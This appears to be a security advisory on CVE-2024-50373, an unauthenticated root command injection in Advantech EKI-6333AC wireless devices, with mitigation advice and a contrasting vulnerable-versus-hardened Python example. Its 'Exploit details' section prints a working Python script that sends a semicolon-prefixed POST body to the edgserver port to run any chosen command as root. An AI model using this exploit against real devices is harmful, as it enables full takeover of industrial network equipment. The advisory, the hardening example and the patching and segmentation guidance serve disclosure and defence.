A critical vulnerability, CVE-2024-50373, has been disclosed in Advantech EKI-6333AC-2G, EKI-6333AC-2GD and EKI-6333AC-1GPO devices. It is classified as CWE-78, "Improper Neutralization of Special Elements used in an OS Command" (OS command injection), and allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges on an affected device.
Exploit details
The vulnerability stems from a lack of authentication on the "edgserver" service, which is enabled by default on the affected devices, combined with a command injection flaw in the code handling the "restore_config_from_utility" operation: data taken from the request is placed into an OS command line without neutralizing shell metacharacters, so a ";" in the input ends the intended command and starts an attacker-supplied one.
The following snippet shows how the vulnerability can be exploited. It sends a single HTTP POST to the edgserver port whose body begins with ";" followed by the command to run:
import socket

TARGET_IP = "192.168.1.1"          # replace with the actual target IP
TARGET_PORT = 53530                # default port of the edgserver service
COMMAND = "YOUR_COMMAND_GOES_HERE" # replace with the command to execute

# The request body is what reaches the restore_config_from_utility handler.
# The leading ';' terminates the command the handler builds and starts the
# injected one; its output is redirected to a file on the device so it can be
# retrieved later (nothing is returned in the HTTP response).
body = ";" + COMMAND + " >/tmp/output.txt\r\n"

# Content-Length is computed from the body: a hard-coded value that does not
# match makes the server wait for more data or truncate the payload.
request = (
    "POST / HTTP/1.1\r\n"
    f"Host: {TARGET_IP}:{TARGET_PORT}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(body)}\r\n"
    "\r\n"
) + body

sock = socket.create_connection((TARGET_IP, TARGET_PORT), timeout=10)
sock.sendall(request.encode("utf-8"))  # sendall() writes the whole buffer; send() may not
sock.close()
Replace YOUR_COMMAND_GOES_HERE with the command to execute on the target device. Because the edgserver service runs as root, the injected command runs as root as well; with the redirect above, its output is written to /tmp/output.txt on the device rather than returned to the client.
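The following is an added illustration of the CWE-78 pattern behind this vulnerability, written for this page rather than taken from Advantech's firmware: a handler that interpolates request data into a shell command line, next to a hardened version that validates the value against an allowlist and executes without a shell. The handler names, the use of "echo" as a harmless stand-in for the real restore tool, and the sample payloads are all constructed for the example.

```python
import re
import subprocess

# Stand-in for the restore operation. The real firmware would run a
# configuration-restore tool here; "echo" keeps the demonstration harmless.
# (Constructed for this example, not the device's actual command.)
RESTORE_TOOL = "echo"

# Allowlist for the only kind of value the operation legitimately needs: a
# bare file name. ';', '|', '&', '$', '`', '/', quotes and whitespace are all
# outside this set and are rejected before any process is spawned.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def vulnerable_restore(name: str) -> str:
    """Vulnerable pattern: request data is interpolated into a shell command.

    With shell=True the string is handed to /bin/sh, so a ';' in `name` ends
    the intended command and starts an attacker-chosen one, exactly what the
    ';'-prefixed POST body in the exploit above relies on.
    """
    cmd = "%s restoring %s" % (RESTORE_TOOL, name)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def hardened_restore(name: str) -> str:
    """Hardened pattern: allowlist validation, then exec with no shell.

    The argv list goes straight to execve(); no shell parses it, so even if
    validation were bypassed a ';' would be a literal character inside one
    argument rather than a command separator.
    """
    if not SAFE_NAME.match(name):
        raise ValueError("rejected restore name: %r" % name)
    proc = subprocess.run([RESTORE_TOOL, "restoring", name],
                          capture_output=True, text=True)
    return proc.stdout


# Constructed inputs: one benign value and one shaped like the exploit body.
BENIGN = "backup-2024.cfg"
INJECTED = "x; echo INJECTED"

if __name__ == "__main__":
    print(vulnerable_restore(BENIGN).strip())    # restoring backup-2024.cfg
    print(vulnerable_restore(INJECTED).strip())  # restoring x, then INJECTED: two commands ran
    print(hardened_restore(BENIGN).strip())      # restoring backup-2024.cfg
    try:
        hardened_restore(INJECTED)
    except ValueError as err:
        print("blocked:", err)
```

The two defences are independent and both are needed: the allowlist stops unexpected values at the boundary, and the argv form removes the shell so that a validation gap does not become code execution.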
Original references
1. CVE-2024-50373 - MITRE's CVE entry for this vulnerability: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50373
2. CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): https://cwe.mitre.org/data/definitions/78.html
Recommendations
Owners of affected devices should apply the firmware update provided by Advantech for this vulnerability as soon as possible.
Until the update is installed, disable the "edgserver" service if it is not needed. If it is, restrict access to its TCP port (53530 by default) to a dedicated management network using network segmentation and firewall or ACL rules: the service requires no authentication, so any host that can reach the port can exploit it. Verify the restriction by confirming that the port is not reachable from untrusted networks.
Conclusion
CVE-2024-50373 is a critical OS command injection vulnerability affecting multiple Advantech EKI devices. It can be exploited by unauthenticated remote attackers to execute arbitrary commands as root. Owners of affected devices should apply the firmware update without delay and, in the meantime, disable the "edgserver" service where it is not needed or restrict its exposure through network segmentation and access control.
Timeline
Published on: 11/26/2024 11:22:06 UTC
Last modified on: 11/26/2024 11:27:04 UTC